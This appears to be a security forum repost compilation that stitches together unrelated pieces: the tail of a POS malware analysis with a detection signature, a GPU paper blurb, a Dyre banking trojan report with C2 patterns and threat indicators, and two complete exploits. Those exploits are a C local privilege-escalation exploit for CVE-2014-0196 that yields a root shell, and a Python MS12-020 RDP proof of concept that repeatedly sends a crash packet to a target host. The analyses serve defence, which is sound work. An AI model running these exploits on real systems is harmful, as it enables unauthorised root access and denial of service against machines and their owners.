content:"POST"; http_method; content:".php"; http_uri; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT 5.1|3b| InfoPath.1 Spark v1.1|0d 0a|"; http_header; fast_pattern:66,20; content:!"Referer|3a|"; http_header; pcre:"/\.php$/U"; reference:md5,3959fb5b5909d9c6fb9c9a408d35f67a; reference:url,trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-ram-scraper-malware.pdf; classtype: slr-et; sid:4004777; rev:1;) This signature refers to the sample as JackPOS, but I think this sample falls somewhere in the spectrum of malware between Alina and JackPOS. As you can see the Spark name has come up several times, both in the POST communication and the named pipe used by the malware. The usage of a version number suggests that the malware author had intentions to produce additional versions. The POST data communication with the C&C server retains the same structure as Alina from v5.2 on, however, Spark chose to reverse the order of the XOR scheme used. Figure 8: XOR'd POST Data To recover the clear text message, bytes 18 through 35 (red) are used as a running XOR key for bytes 76 (green) to the end of the data and then the entire message is XOR’d with 0xAA. This will decrypt the entire message. The yellow section (including the red bytes) contains the header information, while the green is the dynamic data. Earlier variants would first XOR the entire message with 0xAA and then grab bytes 18-35 to decode bytes from 76 to the end. A minor change, but sufficient in that it breaks any tools made to decode any prior communications. I’ve written a ruby script that decodes and parses the traffic and can be found at spark.rb. JackPOS Spark and JackPOS have several similar techniques that relate them. The use of the AutoIt compiled script as a loader is a technique that we have not seen very much and its use with both JackPOS and Spark is a very interesting link. Both use similar blacklist approaches as well as custom functions for finding CC data. However, JackPOS almost exclusively attempts to masquerade as java or a java utility. It also either copies itself directly into the %APPDATA% directory or into a java based sub-directory inside %APPDATA%. JackPOS uses the MAC address as a bot ID and base64 encodes the CC data found on the system in order to obfuscate the exfiltration. In case you missed the link above, here is SpiderLabs' detailed write-up on JackPOS. It seems fairly clear that these are two different variants. So while these two samples appear to be related, Spark bears a much stronger resemblance to Alina than JackPOS. Conclusion There have been rumors and conjecture about Alina source code being sold off as well as JackPOS being a successor to the Alina code base. While I don’t have a pony in the race, the Spark variant shows that someone has been updating the Alina source code recently. The Spark string that shows up in both the named pipe and the POST communication shows an obvious distinction from previous Alina versions. The use of AutoIt as a loader for both Spark and JackPOS variants indicate that it could have potentially been a version between the transition from Alina to JackPOS. I believe it was Shakespeare who said, “Malware by any other name will still steal your credit card data”, or something to that affect. Regardless of what you call these variants, the important part is to understand the details of this threat and how to keep your data secure. Posted by Eric Merritt on 18 December 2014 at 09:00 Sursa: Alina POS malware "sparks" off a new variant - SpiderLabs Anterior

How GPUs Work David Luebke, NVIDIA Research Greg Humphreys, University of Virginia In the early 1990s, ubiquitous interactive 3D graphics was still the stuff of science fiction. By the end of the decade, nearly every new computer contained a graphics processing unit (GPU) dedicated to providing a high-performance, visually rich, interactive 3D experience. This dramatic shift was the inevitable consequence of consumer demand for videogames, advances in manufacturing technology, and the exploitation of the inherent parallelism in the feed-forward graphics pipeline. Today, the raw computational power of a GPU dwarfs that of the most powerful CPU, and the gap is steadily widening. Download: http://www.cs.virginia.edu/~gfx/papers/pdfs/59_HowThingsWork.pdf

Dyre Banking Trojan Author: Brett Stone-Gross and Pallav Khandhar, Dell SecureWorks Counter Threat Unit™ Threat Intelligence Date: 17 December 2014 URL: Dyre Banking Trojan | Dell SecureWorks Summary Threat actors regularly develop new Trojan horse malware to fuel their operations and to ensure the longevity of their botnets. After the takedowns of the Gameover Zeus and Shylock botnets, researchers predicted that a new breed of banking malware would fill the void. In early June 2014, the Dell SecureWorks Counter Threat Unit (CTU) research team discovered the Dyre banking trojan, which was being distributed by Cutwail botnet spam emails that included links to either Dropbox or Cubby file storage services. The threat actors later shifted to distribution via the Upatre downloader trojan. Dyre is also known as Dyreza, Dyzap, and Dyranges by the antivirus industry. Capabilities Dyre harvests credentials, primarily targeting online banking websites to perform Automated Clearing House (ACH) and wire fraud. The malware includes a modular architecture, man-in-the-browser functionality, and a backconnect server that allows threat actors to connect to a bank website through the victim's computer. The man-in-the-browser functionality is based on a unique combination of redirects to fake websites controlled by the threat actor ("web fakes") and a dynamic web inject system that allows the threat actors to manipulate a financial institution's website content. Similar to other banking trojans, Dyre hooks into the most popular web browsers to intercept traffic from a victim's system, stealing information and manipulating website content before it is rendered by the browser. Early Dyre versions of were relatively primitive, sending command and control (C2) communications and stolen data via unencrypted HTTP. Recent iterations of Dyre use SSL to encrypt all C2 communications, as well as a custom encryption algorithm. Dyre also uses RSA cryptography to digitally sign configuration files and malware plugins to prevent tampering. Malware distribution Each Dyre binary has an ID value that allows the malware operators to identify the campaign associated with each compromise. These campaigns are often localized to target specific geographic regions. Since Dyre's introduction, the CTU research team has identified 21 unique Dyre campaigns (see Figure 1). As of this publication, Dyre has targeted more than 242 financial institutions. Figure 1. Distribution of active Dyre campaigns observed by CTU researchers as of this publication. (Source: Dell SecureWorks) Malware distribution vector Dyre is downloaded and installed on compromised systems by the Upatre downloader trojan, which is distributed through spam emails sent by the Cutwail botnet and at least two other spam botnets. The emails contain Upatre as an embedded malware executable in a ZIP attachment (see Figure 2) or as a malicious URL. In both instances, user interaction is required to compromise the targeted system. Dyre campaigns use different lures, such as impersonating FedEx invoices, electronic faxes, and payroll or financial documents. Figure 2. Spam email lure samples dropping Dyre via Upatre downloader as an attachment. (Source: Dell SecureWorks) Architecture The Dyre malware is packed and obfuscated in multiple layers, and it is divided into two modules: the dropper and the main DLL module. The DLL module is stored in two distinct resources named payload32 and payload64, which Dyre activates on 32-bit or 64-bit Windows platforms, respectively. The malware drops a slightly modified copy of itself, using a random filename like "tlBTyLNuJkruXja.exe," in the C:\Windows folder (see Figure 3). When Dyre launches this file, malicious code is injected into svchost.exe. Figure 3. Default location for dropped Dyre files. (Source: Dell SecureWorks) For persistence, Dyre registers as a system service under "Google Update Service" by adding an HKLM\SYSTEM\ControlSet001\Services\googleupdate registry key (see Figure 4). Figure 4. Dyre's persistence mechanism. (Source: Dell SecureWorks) The malware hides its base configuration file, RSA key, and other important data within the resource section of the Dyre DLL (see Figure 5). Figure 5. Dyre resource section containing important data. (Source: Dell SecureWorks) Dyre beacons to the hard-coded IP addresses listed in the base configuration file. The first request registers a bot on the C2 server. The malware sends the compromised system's operating system information to the C2 server and continues beaconing requests. Dyre's web inject engine uses a slightly different approach than other banking trojans. The injected process hooks code into Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer, intercepting victims' credentials when they log into a bank account or other financial service. For each web browser, Dyre hooks different functions within the loaded DLLs: Firefox: PR_Read and PR_Write functions within nspr4.dll Chrome: ssl_read and ssl_write functions within chrome.dll Internet Explorer: functions within wininet.dll When a victim on a compromised system visits one of the targeted banking websites and enters login credentials, Dyre intercepts the data and sends a POST request to the threat actor's drop server. The request includes cookies and browser information. The malware can also manipulate banking website content dynamically, which can be used to circumvent two-factor authentication schemes. Command and control traffic Dyre contacts Google to check network connectivity and then submits a Session Traversal Utilities for NAT (STUN) binding request (see Figure 6). STUN allows a system located behind a network address translator (NAT) to discover a public IP address. Figure 6. Dyre's network connectivity check and STUN requests. (Source: Dell SecureWorks) The STUN servers listed in Table 1 are hard-coded in the Dyre binary. [TABLE=class: tabularr] [TR] [TD]stun1.voiceeclipse.net[/TD] [TD]stun.callwithus.com[/TD] [TD]stun.sipgate.net[/TD] [/TR] [TR] [TD]stun.ekiga.net[/TD] [TD]stun.ideasip.com[/TD] [TD]stun.internetcalls.com[/TD] [/TR] [TR] [TD]stun.noc.ams-ix.net[/TD] [TD]stun.phonepower.com[/TD] [TD]stun.voip.aebc.com[/TD] [/TR] [TR] [TD]stun.voipbuster.com[/TD] [TD]stun.voxgratia.org[/TD] [TD]stun.ipshka.com[/TD] [/TR] [TR] [TD]stun.faktortel.com.au[/TD] [TD]stun.iptel.org[/TD] [TD]stun.voipstunt.com[/TD] [/TR] [TR] [TD]stunserver.org[/TD] [TD]s1.taraba.net[/TD] [TD]s2.taraba.net[/TD] [/TR] [TR] [TD]stun.l.google.com:19302[/TD] [TD]stun1.l.google.com:19302[/TD] [TD]stun2.l.google.com:19302[/TD] [/TR] [TR] [TD]stun3.l.google.com:19302[/TD] [TD]stun4.l.google.com:19302[/TD] [TD]stun.schlund.de[/TD] [/TR] [TR] [TD]stun.rixtelecom.se[/TD] [TD]stun.voiparound.com[/TD] [TD]numb.viagenie.ca[/TD] [/TR] [TR] [TD]stun.stunprotocol.org[/TD] [TD]stun.2talk.co.nz[/TD] [TD][/TD] [/TR] [/TABLE] Table 1. Hard-coded STUN servers. To hide its backend infrastructure, Dyre deploys a set of proxy servers that act as C2 servers. As shown in Figure 7, these servers are primarily located in North America and Europe. The threat actors have also implemented additional methods to maintain control of the botnet. Figure 7. Geographic distribution of Dyre C2 servers. (Source: Dell SecureWorks) Dyre uses SSL to communicate with its C2 server. The requests use a standard structure, substituting appropriate values for the <Campaign ID>, <Bot ID>, and <Architecture> variables: GET /<Campaign ID>/<Bot ID>/5/cert/EXT-IP/HTTP/1.1 (Register the Bot) GET /<Campaign ID>/<Bot ID>/0/Win_XP_32bit/1023/EXT-IP/HTTP/1.1 (Register OS of Bot) GET /<Campaign ID>/<Bot ID>/1/FcJgUwyCWvgLPymGiJGwUkwCVcBMmiD/EXT-IP/(Send live signal) GET /<Campaign ID>/<Bot ID>/5/httprdc/EXT-IP/HTTP/1.1 (Ask for web fakes configuration data with target list) GET /<Campaign ID>/<Bot ID>/5/respparser/EXT-IP/HTTP/1.1 (Request dynamic web inject configuration) GET /<Campaign ID>/<Bot ID>/5/twg<Architecture>/EXT-IP/HTTP/1.1 (Request I2P plugin) GET /<Campaign ID>/<Bot ID>/5/i2p<Architecture>/EXT-IP/HTTP/1.1 (Request grabber plugin) GET /<Campaign ID>/<Bot ID>/5/n_vnc<Architecture>/EXT-IP/HTTP/1.1 (Request VNC plugin) GET /<Campaign ID>/<Bot ID>/5/n_tv<Architecture>/EXT-IP/HTTP/1.1 (Request TV plugin) GET /<Campaign ID>/<Bot ID>/5/cfg_bc/EXT-IP/HTTP/1.1 (Request Back Connect plugin) GET /<Campaign ID>/<Bot ID>/14/NAT/Port%20restricted%20NAT/0/EXT-IP/(NAT status) Figure 8 shows a Dyre request for the configuration file identifying the list of URLs to redirect to the malicious server hosting the web fake. The C2 server's reply is encrypted with a custom encryption algorithm, and the payload is digitally signed using a 1024-bit RSA key. Figure 8. Dyre's configuration request to the C2 server. (Source: Dell SecureWorks) Dyre performs a man-in-the-browser attack to steal data sent to a legitimate bank website. The malware sends the stolen data to its exfiltration server in an HTTP POST request (see Figure 9). Figure 9. Dyre HTTP POST request to exfiltration server. (Source: Dell SecureWorks) Command and control resiliency Since Dyre’s inception, it has relied upon a set of hard-coded proxy servers to communicate with its backend infrastructure. The threat actors have implemented two mechanisms to maintain control of the botnet if the proxies are unreachable: a domain generation algorithm and a plugin that integrates with an anonymization network called I2P. Domain generation algorithm Similar to other malware families, Dyre uses a domain generation algorithm (DGA) that is seeded by the current date. It generates 1,000 34-character domains per day, which are appended to one of eight country code top-level domains (ccTLDs) in Asia and the Pacific Islands: .cc, .ws, .to, .in, .hk, .cn, .tk, and .so. The following domains were generated on December 8, 2014: y3aaa48a7056d7075c3760cdbd90a75b8f.cc z376dfe4955a257a78944864dd0158d172.ws a8377c5a7c390331b15c1df94fa745e38a.to ba3be71036fc2c06d603a2b17d41ffe71a.in c9cca04cec2588918820cf33ba4337cca8.hk dec4f75e53d7202136164e2b26456dabdf.cn e3d68349d47efa0d5a9a92b1239bc4d48c.tk f85db5ce8675f53b61f00ca0e822a33312.so CTU researchers sinkholed a Dyre DGA domain to identify sources of infection and to ascertain the number of compromised systems that resorted to the DGA for command and control. During a 24-hour interval, the sinkhole received requests from 8,815 unique IP addresses. The U.S. led the number of compromised systems with 59%, followed by Canada with 8%, Portugal with 7%, the UK with 5%, and Turkey with 3% (see Figure 10). Figure 10. Infected Dyre bots reaching out to DGA domains. (Source: Dell SecureWorks) I2P The Invisible Internet Project (I2P) is an overlay network similar to Tor that offers anonymity. It provides anonymous hosting known as eepSites, which are similar to Tor's hidden services. eepSites allow users to access websites in a way that masks the true location of the server, so that it cannot be easily identified and taken down. On December 3, 2014, CTU researchers observed a Dyre sample that included the following I2P eepSite domain: nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p. Dyre's implementation of an I2P plugin has several tradeoffs. It makes the malware's backend server more difficult to trace, and the encapsulation of Dyre requests using I2P's encrypted protocol could complicate development of network-based signatures. However, I2P has not been widely adopted, so its presence may also be used to identify compromises. Connection to Gozi Neverquest CTU researchers have observed a relationship between the Dyre trojan and the Neverquest variant of Gozi. On several occasions, Gozi Neverquest pushed commands to download and execute a Dyre executable, and there have been other instances of Dyre issuing commands to download and execute a Gozi Neverquest executable. These examples suggest that one or more of the same threat actors are involved with both botnets, and they may leverage each trojan according to their specific needs. Conclusion Dyre has emerged from its early stages of development to become one of the most prominent banking trojans. Each iteration included refinements and new features to make it more powerful and robust. The version of Dyre being distributed as of this publication provides advanced capabilities with web fakes, dynamic web injects, a modular design, and multiple methods for maintaining command and control. The introduction of Dyre shortly after the takedown of Gameover Zeus shows the determination of threat actors targeting the financial vertical. Threat indicators The threat indicators in Table 2 can be used to detect activity related to the Dyre banking malware. The IP addresses listed in the indicators table may contain malicious content, so consider the risks before opening them in a browser. [TABLE=class: tabularr] [TR] [TH]Indicator[/TH] [TH]Type[/TH] [TH]Context[/TH] [/TR] [TR] [TD]0a77a39285d6bc816791320bb13408e5[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]c3980a6228b68f88a0718de7a0362116[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]b5b3af636f545da62f87c2773aa99016[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]ec525c578d14a15d8d913e83ec5c557b[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]32d32802a97b9c24e1eafcea6af52440[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]2d8923ef39b1fa0a091965735f3490f3[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]1a52993e4546c3d6adad037af74ce2a8[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]156f730bbb6b6cada4ef89e22ddc68ab[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]3597f17748f9bb7d008840a4b1391582[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]c6315a09e06e2ba775e5be0979d23755[/TD] [TD]MD5 hash[/TD] [TD]Dyre trojan[/TD] [/TR] [TR] [TD]5.79.86.19[/TD] [TD]IP address[/TD] [TD]Dyre exfiltration/web inject server[/TD] [/TR] [TR] [TD]212.56.214.154[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]202.153.35.133[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]80.248.224.75[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.152[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]166.78.103.85[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.158[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]109.228.17.155[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]176.114.0.58[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.134.53[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.181.164[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.184.75[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]213.239.209.196[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]212.56.214.130[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]37.59.2.42[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]93.190.139.178[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.138.12[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]85.25.145.179[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.172.179.9[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]203.183.172.196[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]94.23.61.172[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]94.23.196.90[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]217.23.8.68[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]193.203.50.17[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]193.203.50.69[/TD] [TD]IP address[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]nhgyzrn2p2gejk57wveao5kxa7b3nhtc4saoonjpsy65mapycaua.b32.i2p[/TD] [TD]I2P domain[/TD] [TD]Dyre C2 server[/TD] [/TR] [TR] [TD]Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0[/TD] [TD]User-Agent[/TD] [TD]Dyre User-Agent[/TD] [/TR] [TR] [TD]Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36[/TD] [TD]User-Agent[/TD] [TD]Dyre User-Agent[/TD] [/TR] [TR] [TD]cd2sd48za09[/TD] [TD]Mutex[/TD] [TD]Mutex created by Dyre[/TD] [/TR] [TR] [TD]5efw48e8re54[/TD] [TD]Mutex[/TD] [TD]Mutex created by Dyre[/TD] [/TR] [/TABLE] Table 2. Threat indicators for the Dyre trojan. Sursa: Dyre Banking Trojan | Dell SecureWorks © Dell SecureWorks

CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race /* * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race * condition * * Slightly-less-than-POC privilege escalation exploit * For kernels >= v3.14-rc1 * * Matthew Daley <mattd@bugfuzz.com> * * Usage: * $ gcc cve-2014-0196-md.c -lutil -lpthread * $ ./a.out * [+] Resolving symbols * [+] Resolved commit_creds: 0xffffffff81056694 * [+] Resolved prepare_kernel_cred: 0xffffffff810568a7 * [+] Doing once-off allocations * [+] Attempting to overflow into a tty_struct............... * [+] Got it * # id * uid=0(root) gid=0(root) groups=0(root) * * WARNING: The overflow placement is still less-than-ideal; there is a 1/4 * chance that the overflow will go off the end of a slab. This does not * necessarily lead to an immediate kernel crash, but you should be prepared * for the worst (i.e. kernel oopsing in a bad state). In theory this would be * avoidable by reading /proc/slabinfo on systems where it is still available * to unprivileged users. * * Caveat: The vulnerability should be exploitable all the way from * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer * GFP_ATOMIC memory consumption") that make exploitation simpler, which this * exploit relies on. * * Thanks to Jon Oberheide for his help on exploitation technique. */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <pthread.h> #include <pty.h> #include <stdio.h> #include <string.h> #include <termios.h> #include <unistd.h> #define TTY_MAGIC 0x5401 #define ONEOFF_ALLOCS 200 #define RUN_ALLOCS 30 struct device; struct tty_driver; struct tty_operations; typedef struct { int counter; } atomic_t; struct kref { atomic_t refcount; }; struct tty_struct_header { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; } overwrite; typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred); int master_fd, slave_fd; char buf[1024] = {0}; commit_creds_fn commit_creds; prepare_kernel_cred_fn prepare_kernel_cred; int payload(void) { commit_creds(prepare_kernel_cred(0)); return 0; } unsigned long get_symbol(char *target_name) { FILE *f; unsigned long addr; char dummy; char name[256]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) return 0; while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name); if (ret == 0) { fscanf(f, "%s\n", name); continue; } if (!strcmp(name, target_name)) { printf("[+] Resolved %s: %p\n", target_name, (void *)addr); fclose(f); return addr; } } printf("[-] Couldn't resolve \"%s\"\n", name); fclose(f); return 0; } void *overwrite_thread_fn(void *p) { write(slave_fd, buf, 511); write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1)); write(slave_fd, &overwrite, sizeof(overwrite)); } int main() { char scratch[1024] = {0}; void *tty_operations[64]; int i, temp_fd_1, temp_fd_2; for (i = 0; i < 64; ++i) tty_operations[i] = payload; overwrite.magic = TTY_MAGIC; overwrite.kref.refcount.counter = 0x1337; overwrite.dev = (struct device *)scratch; overwrite.driver = (struct tty_driver *)scratch; overwrite.ops = (struct tty_operations *)tty_operations; puts("[+] Resolving symbols"); commit_creds = (commit_creds_fn)get_symbol("commit_creds"); prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred"); if (!commit_creds || !prepare_kernel_cred) return 1; puts("[+] Doing once-off allocations"); for (i = 0; i < ONEOFF_ALLOCS; ++i) if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) { puts("[-] pty creation failed"); return 1; } printf("[+] Attempting to overflow into a tty_struct..."); fflush(stdout); for (i = 0; ; ++i) { struct termios t; int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j; pthread_t overwrite_thread; if (!(i & 0xfff)) { putchar('.'); fflush(stdout); } if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } for (j = 0; j < RUN_ALLOCS; ++j) if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) { puts("\n[-] pty creation failed"); return 1; } close(fds[RUN_ALLOCS / 2]); close(fds2[RUN_ALLOCS / 2]); write(slave_fd, buf, 1); tcgetattr(master_fd, &t); t.c_oflag &= ~OPOST; t.c_lflag |= ECHO; tcsetattr(master_fd, TCSANOW, &t); if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) { puts("\n[-] Overwrite thread creation failed"); return 1; } write(master_fd, "A", 1); pthread_join(overwrite_thread, NULL); for (j = 0; j < RUN_ALLOCS; ++j) { if (j == RUN_ALLOCS / 2) continue; ioctl(fds[j], 0xdeadbeef); ioctl(fds2[j], 0xdeadbeef); close(fds[j]); close(fds2[j]); } ioctl(master_fd, 0xdeadbeef); ioctl(slave_fd, 0xdeadbeef); close(master_fd); close(slave_fd); if (!setresuid(0, 0, 0)) { setresgid(0, 0, 0); puts("\n[+] Got it :)"); execl("/bin/bash", "/bin/bash", NULL); } } } Sursa: [C] CVE-2014-0196: Linux kernel 12/05/2014 - Pastebin.com

# MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org import socket import sys buf="" buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19 buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224 buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x7f\x65\x82\x01\x94\x04" #MULTIPOINT-COMMUNICATION-SERVICE T.125 buf+="\x01\x01\x04\x01\x01\x01\x01\xff" # "Fuck you Chelios" packet buf+="\x30\x19\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x02\x02\x04" buf+="\x00\x00\x00\x00\x02\x04\x00\x00" buf+="\x00\x01\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x01\x02\x02" buf+="\xff\xff\x02\x04\x00\x00\x00\x02" buf+="\x30\x19\x02\x04\x00\x00\x00\x01" buf+="\x02\x04\x00\x00\x00\x01\x02\x04" buf+="\x00\x00\x00\x01\x02\x04\x00\x00" buf+="\x00\x01\x02\x04\x00\x00\x00\x00" buf+="\x02\x04\x00\x00\x00\x01\x02\x02" buf+="\x04\x20\x02\x04\x00\x00\x00\x02" buf+="\x30\x1c\x02\x02\xff\xff\x02\x02" buf+="\xfc\x17\x02\x02\xff\xff\x02\x04" buf+="\x00\x00\x00\x01\x02\x04\x00\x00" buf+="\x00\x00\x02\x04\x00\x00\x00\x01" buf+="\x02\x02\xff\xff\x02\x04\x00\x00" buf+="\x00\x02\x04\x82\x01\x33\x00\x05" buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00" buf+="\x08\x00\x10\x00\x01\xc0\x00\x44" buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8" buf+="\x00\x04\x00\x08\x00\x80\x02\xe0" buf+="\x01\x01\xca\x03\xaa\x09\x04\x00" buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f" buf+="\x00\x53\x00\x54\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x04\x00\x00" buf+="\x00\x00\x00\x00\x00\x0c\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x01\xca\x01\x00\x00\x00\x00" buf+="\x00\x10\x00\x07\x00\x01\x00\x30" buf+="\x00\x30\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x30\x00\x30\x00\x30\x00\x30" buf+="\x00\x2d\x00\x30\x00\x30\x00\x30" buf+="\x00\x30\x00\x30\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x00\x00\x00" buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c" buf+="\x00\x0d\x00\x00\x00\x00\x00\x00" buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00" buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c" buf+="\x00\x03\x00\x00\x00\x72\x64\x70" buf+="\x64\x72\x00\x00\x00\x00\x00\x80" buf+="\x80\x63\x6c\x69\x70\x72\x64\x72" buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70" buf+="\x73\x6e\x64\x00\x00\x00\x00\x00" buf+="\xc0" buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125 buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" # ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12 buf+="\x02\xf0\x80" #ITU-T Rec X.224 buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125 buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12 buf+="\x06\xd0\x00\x00\x12\x34\x00" #ITU-T Rec X.224 HOST = sys.argv[1] PORT = 3389 for i in range(1000): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST,PORT)) print "sending: %d bytes" % len(buf) s.send(buf) rec = s.recv(100) print "received: %d bytes" % len(rec) s.close() # BlackBap.Org Sursa: [C#] # MS12-020 / CVE-2012-0002 Vulnerability - Proof of Concept # BlackBap.Org i - Pastebin.com

